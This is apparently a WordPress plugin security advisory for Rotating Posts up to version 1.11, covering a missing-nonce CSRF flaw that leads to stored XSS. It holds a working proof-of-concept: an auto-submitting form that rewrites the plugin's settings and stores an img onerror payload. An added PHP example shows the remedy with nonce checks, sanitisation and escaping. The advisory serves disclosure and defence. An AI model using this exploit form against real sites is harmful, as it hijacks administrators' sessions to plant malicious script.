WordPress Plugin Vulnerabilities
Rotating Posts <= 1.11 - Arbitrary Settings Update to Stored XSS via CSRF
Description
The plugin performs no CSRF check (no nonce verification) when its settings are updated via the options-general.php?page=rp-admin.php admin page. An attacker can therefore make a logged-in administrator who visits an attacker-controlled page update any of the plugin's settings with attacker-chosen values. As the title and the PoC indicate, the stored values are not sufficiently sanitised or escaped, so setting rp_read_more to an HTML payload results in Stored XSS on the pages where the plugin output is rendered.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=rp-admin.php" method="POST">
  <!-- No nonce field is sent: the plugin never checks for one -->
  <input type="text" name="rp_submit_hidden" value="submit">
  <input type="text" name="rp_number_posts" value="5">
  <input type="text" name="rp_timer_sec" value="5">
  <!-- Stored XSS payload saved as the "read more" label -->
  <input type="text" name="rp_read_more" value='"><img src=x onerror=alert(/XSS/)>'>
  <input type="text" name="rp_title" value="true">
  <input type="text" name="rp_date_time" value="true">
  <input type="text" name="rp_date_time_str" value="F jS, Y">
  <input type="text" name="rp_author" value="true">
  <input type="text" name="rp_author_prefix" value="by">
  <input type="text" name="rp_categories" value="true">
  <input type="text" name="rp_comments" value="true">
  <input type="text" name="rp_use_this_category" value="0">
  <input type="text" name="rp_left" value="https://example.com/wp-content/plugins/rotating-posts/images/left.jpg">
  <input type="text" name="rp_right" value="https://example.com/wp-content/plugins/rotating-posts/images/right.jpg">
  <input type="text" name="rp_pause_normal" value="https://example.com/wp-content/plugins/rotating-posts/images/pause.jpg">
  <input type="text" name="rp_pause_pressed" value="https://example.com/wp-content/plugins/rotating-posts/images/pause_on.jpg">
</form>
<script>
  // Auto-submit as soon as the logged-in admin loads the attacker's page
  document.getElementById("test").submit();
</script>
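As an added example (not the plugin's own code, and not part of this advisory or the researcher's submission), the following shows how a WordPress settings handler for the fields used in the PoC above can be protected: a nonce via wp_nonce_field()/check_admin_referer(), a capability check, sanitisation on input and escaping on output. The function names, the nonce action 'rp_save_settings', the nonce field name 'rp_nonce', the option defaults and the one-to-one mapping of POST fields to option names are assumptions made for the example.

```php
<?php
// Added example, not the Rotating Posts plugin's code. Function names, the
// nonce action/field, defaults and the POST-field-to-option mapping are assumed.

function rp_example_settings_form() {
    // Capability check: only users who may manage options see the form.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'options-general.php?page=rp-admin.php' ) ); ?>">
        <?php wp_nonce_field( 'rp_save_settings', 'rp_nonce' ); ?>
        <input type="hidden" name="rp_submit_hidden" value="submit">
        <input type="text" name="rp_number_posts" value="<?php echo esc_attr( get_option( 'rp_number_posts', 5 ) ); ?>">
        <input type="text" name="rp_read_more" value="<?php echo esc_attr( get_option( 'rp_read_more', 'Read more' ) ); ?>">
        <input type="submit" value="Save">
    </form>
    <?php
}

function rp_example_save_settings() {
    if ( empty( $_POST['rp_submit_hidden'] ) ) {
        return false;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // check_admin_referer() dies with the "link has expired" page when the
    // nonce is missing or invalid. The PoC form above carries no nonce, so the
    // cross-site submission stops here; a nonce is per-user and per-session,
    // so the attacker cannot obtain a valid one for the victim admin.
    check_admin_referer( 'rp_save_settings', 'rp_nonce' );

    // Sanitise on input, by type: integers, plain-text labels, booleans, URLs.
    update_option( 'rp_number_posts', absint( $_POST['rp_number_posts'] ?? 5 ) );
    update_option( 'rp_timer_sec',    absint( $_POST['rp_timer_sec'] ?? 5 ) );
    update_option( 'rp_read_more',    sanitize_text_field( wp_unslash( $_POST['rp_read_more'] ?? '' ) ) );
    update_option( 'rp_date_time_str', sanitize_text_field( wp_unslash( $_POST['rp_date_time_str'] ?? 'F jS, Y' ) ) );
    update_option( 'rp_author_prefix', sanitize_text_field( wp_unslash( $_POST['rp_author_prefix'] ?? 'by' ) ) );
    update_option( 'rp_use_this_category', absint( $_POST['rp_use_this_category'] ?? 0 ) );
    foreach ( array( 'rp_title', 'rp_date_time', 'rp_author', 'rp_categories', 'rp_comments' ) as $flag ) {
        update_option( $flag, ( isset( $_POST[ $flag ] ) && 'true' === $_POST[ $flag ] ) ? 'true' : 'false' );
    }
    foreach ( array( 'rp_left', 'rp_right', 'rp_pause_normal', 'rp_pause_pressed' ) as $img ) {
        update_option( $img, esc_url_raw( wp_unslash( $_POST[ $img ] ?? '' ) ) );
    }
    return true;
}

// Escape on output as well, so a value that ever slipped past sanitisation
// cannot break out of the text context where the label is rendered.
function rp_example_render_read_more() {
    return '<a class="rp-read-more" href="#">' . esc_html( get_option( 'rp_read_more', 'Read more' ) ) . '</a>';
}
```

Two layers matter here. The nonce check alone closes the CSRF vector; the sanitisation and esc_html() close the Stored XSS even for a request that is legitimately authenticated (for example an administrator pasting a payload, or a future bypass of the nonce).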
Affects Plugins: Rotating Posts
Classification
Type: CSRF
Miscellaneous
Original Researcher: Daniel Ruf
Submitter: Daniel Ruf
Verified: Yes
Timeline
Publicly Published: 2022-05-31
Added: 2022-05-31
Last Updated: 2023-03-01